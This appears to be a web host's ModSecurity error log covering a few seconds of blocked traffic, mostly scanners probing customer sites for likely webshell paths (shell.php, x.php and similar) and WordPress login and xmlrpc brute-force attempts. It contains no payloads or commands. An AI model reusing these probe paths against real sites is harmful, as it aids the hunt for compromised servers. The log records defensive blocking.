[Tue May 26 18:39:36.782825 2026] [security2:error] [pid 1015481:tid 1015705] [client 20.151.117.104:14082] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/wp-mail.php"] [unique_id "ahWbkLQIKfWDMlp2INdQ5gAAAWg"]
[Tue May 26 18:39:36.817936 2026] [security2:error] [pid 1015481:tid 1015654] [client 20.196.127.68:14098] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/past.php"] [unique_id "ahWbkLQIKfWDMlp2INdQ5wAAATU"]
[Tue May 26 18:39:37.018211 2026] [security2:error] [pid 1015481:tid 1015609] [remote 132.148.78.219:57526] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 219.78.148.132.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/wp-login.php"] [unique_id "ahWbkbQIKfWDMlp2INdQ7wABTH8"], referer: https://taotechservices.com/wp-login.php
[Tue May 26 18:39:37.018481 2026] [security2:error] [pid 1015481:tid 1015614] [client 20.151.117.104:14108] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/bolt.php"] [unique_id "ahWbkbQIKfWDMlp2INdQ7gAAAQ0"]
[Tue May 26 18:39:37.263790 2026] [security2:error] [pid 1015481:tid 1015657] [client 20.151.117.104:10333] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/bthil.php"] [unique_id "ahWbkbQIKfWDMlp2INdQ-QAAATg"]
[Tue May 26 18:39:37.272726 2026] [security2:error] [pid 1015481:tid 1015612] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWbkLQIKfWDMlp2INdQ6gAAAQs"]
[Tue May 26 18:39:37.443532 2026] [security2:error] [pid 1015481:tid 1015717] [client 130.131.224.225:4132] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "preetishah.com"] [uri "/sbhu.php"] [unique_id "ahWbkbQIKfWDMlp2INdQ-wAAAXQ"]
[Tue May 26 18:39:37.443662 2026] [security2:error] [pid 1015481:tid 1015717] [client 130.131.224.225:4132] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "preetishah.com"] [uri "/sbhu.php"] [unique_id "ahWbkbQIKfWDMlp2INdQ-wAAAXQ"]
[Tue May 26 18:39:37.485358 2026] [security2:error] [pid 1015481:tid 1015643] [client 20.196.127.68:1564] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/root.php"] [unique_id "ahWbkbQIKfWDMlp2INdQ_AAAASo"]
[Tue May 26 18:39:37.523288 2026] [cgid:error] [pid 1015481:tid 1015623] [client 20.151.117.104:14036] AH01265: stderr from /home2/thego2e9/public_html/cgi-bin/: attempt to invoke directory as script
[Tue May 26 18:39:37.595382 2026] [security2:error] [pid 1015481:tid 1015619] [client 20.151.117.104:14036] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/x.php"] [unique_id "ahWbkbQIKfWDMlp2INdRBAAAARI"]
[Tue May 26 18:39:37.818233 2026] [security2:error] [pid 1015481:tid 1015620] [client 20.151.117.104:10953] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/index/function.php"] [unique_id "ahWbkbQIKfWDMlp2INdRCwAAARM"]
[Tue May 26 18:39:38.057654 2026] [security2:error] [pid 1015481:tid 1015575] [remote 211.23.68.235:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.68.23.211.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahWbkbQIKfWDMlp2INdRDAABa10"]
[Tue May 26 18:39:38.102593 2026] [security2:error] [pid 1015481:tid 1015688] [client 20.151.117.104:10976] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/aaa.php"] [unique_id "ahWbkrQIKfWDMlp2INdRDQAAAVc"]
[Tue May 26 18:39:38.157265 2026] [security2:error] [pid 1015481:tid 1015662] [client 20.196.127.68:3934] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/r.php"] [unique_id "ahWbkrQIKfWDMlp2INdRDgAAAT0"]
[Tue May 26 18:39:38.359163 2026] [security2:error] [pid 1015481:tid 1015680] [client 20.151.117.104:14046] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/abcd.php"] [unique_id "ahWbkrQIKfWDMlp2INdRGAAAAU8"]
[Tue May 26 18:39:38.469525 2026] [security2:error] [pid 1015481:tid 1015671] [client 172.226.44.138:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahWbkrQIKfWDMlp2INdRFwAAAUY"]
[Tue May 26 18:39:38.637860 2026] [security2:error] [pid 1015481:tid 1015649] [client 20.151.117.104:14109] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/wp-good.php"] [unique_id "ahWbkrQIKfWDMlp2INdRHAAAATA"]
[Tue May 26 18:39:38.768683 2026] [security2:error] [pid 1015481:tid 1015701] [client 20.196.127.68:7679] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/sid3.php"] [unique_id "ahWbkrQIKfWDMlp2INdRHgAAAWQ"]
[Tue May 26 18:39:38.944051 2026] [security2:error] [pid 1015481:tid 1015692] [client 20.151.117.104:10952] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/simple.php"] [unique_id "ahWbkrQIKfWDMlp2INdRJgAAAVs"]
[Tue May 26 18:39:39.223657 2026] [security2:error] [pid 1015481:tid 1015554] [remote 50.6.192.190:37020] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.192.6.50.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWbk7QIKfWDMlp2INdRJwABSEg"]
[Tue May 26 18:39:39.300159 2026] [security2:error] [pid 1015481:tid 1015626] [client 146.174.160.147:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWbkrQIKfWDMlp2INdRJQAAARk"]
[Tue May 26 18:39:39.331107 2026] [security2:error] [pid 1015481:tid 1015637] [client 20.151.117.104:13569] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/edit-tags.php"] [unique_id "ahWbk7QIKfWDMlp2INdRLQAAASQ"]
[Tue May 26 18:39:39.414732 2026] [security2:error] [pid 1015481:tid 1015699] [client 20.196.127.68:10726] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/ss.php"] [unique_id "ahWbk7QIKfWDMlp2INdRLwAAAWI"]
[Tue May 26 18:39:39.501089 2026] [security2:error] [pid 1015481:tid 1015549] [remote 50.6.192.190:37020] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.192.6.50.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWbk7QIKfWDMlp2INdRMAABh0M"], referer: https://obinnawrites.com/wp-login.php
[Tue May 26 18:39:39.643686 2026] [security2:error] [pid 1015481:tid 1015623] [client 20.151.117.104:10982] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/u.php"] [unique_id "ahWbk7QIKfWDMlp2INdRNwAAARY"]
[Tue May 26 18:39:39.930653 2026] [security2:error] [pid 1015481:tid 1015711] [client 20.151.117.104:10989] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/wp-content/themes/admin.php"] [unique_id "ahWbk7QIKfWDMlp2INdRPAAAAW4"]
[Tue May 26 18:39:39.986635 2026] [security2:error] [pid 1015481:tid 1015636] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWbk7QIKfWDMlp2INdRNgAAASM"]
[Tue May 26 18:39:39.987604 2026] [security2:error] [pid 1015481:tid 1015638] [client 130.131.224.225:37401] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "preetishah.com"] [uri "/bgymj.php"] [unique_id "ahWbk7QIKfWDMlp2INdRPQAAASU"]
[Tue May 26 18:39:39.987749 2026] [security2:error] [pid 1015481:tid 1015638] [client 130.131.224.225:37401] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "preetishah.com"] [uri "/bgymj.php"] [unique_id "ahWbk7QIKfWDMlp2INdRPQAAASU"]
[Tue May 26 18:39:40.042069 2026] [security2:error] [pid 1015481:tid 1015666] [client 20.196.127.68:9257] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/sts.php"] [unique_id "ahWblLQIKfWDMlp2INdRQQAAAUE"]
[Tue May 26 18:39:40.182093 2026] [security2:error] [pid 1015481:tid 1015700] [client 124.43.5.103:62824] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWblLQIKfWDMlp2INdRQgAAAWM"]
[Tue May 26 18:39:40.182259 2026] [security2:error] [pid 1015481:tid 1015700] [client 124.43.5.103:62824] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWblLQIKfWDMlp2INdRQgAAAWM"]
[Tue May 26 18:39:40.232169 2026] [security2:error] [pid 1015481:tid 1015647] [client 20.151.117.104:10361] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/h.php"] [unique_id "ahWblLQIKfWDMlp2INdRQwAAAS4"]
[Tue May 26 18:39:40.489268 2026] [security2:error] [pid 1015481:tid 1015668] [client 20.151.117.104:10960] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/ms-edit.php"] [unique_id "ahWblLQIKfWDMlp2INdRSgAAAUM"]
[Tue May 26 18:39:40.657484 2026] [security2:error] [pid 1015481:tid 1015678] [client 20.196.127.68:12638] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/shell.php"] [unique_id "ahWblLQIKfWDMlp2INdRTgAAAU0"]
[Tue May 26 18:39:40.728002 2026] [security2:error] [pid 1015481:tid 1015732] [client 20.151.117.104:10986] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/a7.php"] [unique_id "ahWblLQIKfWDMlp2INdRTwAAAYM"]
[Tue May 26 18:39:40.986601 2026] [security2:error] [pid 1015481:tid 1015615] [client 20.151.117.104:14133] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/manager.php"] [unique_id "ahWblLQIKfWDMlp2INdRVAAAAQ4"]
[Tue May 26 18:39:41.239088 2026] [security2:error] [pid 1015481:tid 1015657] [client 20.151.117.104:10330] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/w1.php"] [unique_id "ahWblbQIKfWDMlp2INdRWwAAATg"]
[Tue May 26 18:39:41.241635 2026] [security2:error] [pid 1015481:tid 1015649] [client 20.196.127.68:6855] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/setup-config.php"] [unique_id "ahWblbQIKfWDMlp2INdRXAAAATA"]
[Tue May 26 18:39:41.332028 2026] [security2:error] [pid 1015481:tid 1015671] [client 114.119.145.3:39609] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "virgence.com"] [uri "/index.php/portfolio_page/mobile-applications/"] [unique_id "ahWblbQIKfWDMlp2INdRXQAAAUY"], referer: https://virgence.com/
[Tue May 26 18:39:41.685127 2026] [security2:error] [pid 1015481:tid 1015690] [client 130.131.224.225:23288] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "preetishah.com"] [uri "/file30.php"] [unique_id "ahWblbQIKfWDMlp2INdRaQAAAVk"]
[Tue May 26 18:39:41.685237 2026] [security2:error] [pid 1015481:tid 1015690] [client 130.131.224.225:23288] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "preetishah.com"] [uri "/file30.php"] [unique_id "ahWblbQIKfWDMlp2INdRaQAAAVk"]
[Tue May 26 18:39:41.841056 2026] [security2:error] [pid 1015481:tid 1015685] [client 20.196.127.68:10712] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/t.php"] [unique_id "ahWblbQIKfWDMlp2INdRagAAAVQ"]
[Tue May 26 18:39:41.945810 2026] [security2:error] [pid 1015481:tid 1015699] [client 20.151.117.104:14101] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/wp-login.php"] [unique_id "ahWblbQIKfWDMlp2INdRZQAAAWI"]
[Tue May 26 18:39:42.065328 2026] [security2:error] [pid 1015481:tid 1015729] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWblbQIKfWDMlp2INdRaAAAAYA"]
[Tue May 26 18:39:42.185408 2026] [security2:error] [pid 1015481:tid 1015571] [remote 121.200.216.55:40974] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.216.200.121.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWblbQIKfWDMlp2INdRbgABNFk"]
[Tue May 26 18:39:42.191947 2026] [security2:error] [pid 1015481:tid 1015715] [client 20.151.117.104:10315] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/default.php"] [unique_id "ahWblrQIKfWDMlp2INdRdgAAAXI"]
[Tue May 26 18:39:42.319832 2026] [security2:error] [pid 1015481:tid 1015546] [remote 103.255.134.61:41524] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.134.255.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWblrQIKfWDMlp2INdRcgABHEA"]
[Tue May 26 18:39:42.455066 2026] [security2:error] [pid 1015481:tid 1015656] [client 20.196.127.68:6856] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/up.php"] [unique_id "ahWblrQIKfWDMlp2INdReAAAATc"]
[Tue May 26 18:39:42.462175 2026] [security2:error] [pid 1015481:tid 1015664] [client 20.151.117.104:10981] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/i.php"] [unique_id "ahWblrQIKfWDMlp2INdReQAAAT8"]
[Tue May 26 18:39:42.788565 2026] [security2:error] [pid 1015481:tid 1015662] [client 20.151.117.104:14021] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/wp-includes/Requests/library/index.php"] [unique_id "ahWblrQIKfWDMlp2INdRfgAAAT0"]
[Tue May 26 18:39:42.872750 2026] [security2:error] [pid 1015481:tid 1015708] [client 130.131.224.225:42370] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 225.224.131.130.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "preetishah.com"] [uri "/yellow.php"] [unique_id "ahWblrQIKfWDMlp2INdRfwAAAWs"]
[Tue May 26 18:39:42.872883 2026] [security2:error] [pid 1015481:tid 1015708] [client 130.131.224.225:42370] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "preetishah.com"] [uri "/yellow.php"] [unique_id "ahWblrQIKfWDMlp2INdRfwAAAWs"]
[Tue May 26 18:39:43.113075 2026] [security2:error] [pid 1015481:tid 1015659] [client 20.196.127.68:3633] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 68.127.196.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aeromodellingconsultants.com"] [uri "/ultra.php"] [unique_id "ahWbl7QIKfWDMlp2INdRhAAAATo"]
[Tue May 26 18:39:43.144474 2026] [security2:error] [pid 1015481:tid 1015733] [client 20.151.117.104:10972] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/wp-content/themes/index.php"] [unique_id "ahWbl7QIKfWDMlp2INdRhQAAAYQ"]
[Tue May 26 18:39:43.369362 2026] [security2:error] [pid 1015481:tid 1015683] [client 20.151.117.104:10998] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/gecko-new.php"] [unique_id "ahWbl7QIKfWDMlp2INdRiAAAAVI"]
[Tue May 26 18:39:43.491548 2026] [security2:error] [pid 1015481:tid 1015600] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWbl7QIKfWDMlp2INdRhgABaHY"]
[Tue May 26 18:39:43.491817 2026] [security2:error] [pid 1015481:tid 1015705] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWbl7QIKfWDMlp2INdRhgABaHY"]
[Tue May 26 18:39:43.597208 2026] [security2:error] [pid 1015481:tid 1015728] [client 20.151.117.104:10978] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.thegoodsporting.com"] [uri "/NewFile.php"] [unique_id "ahWbl7QIKfWDMlp2INdRiwAAAX8"]
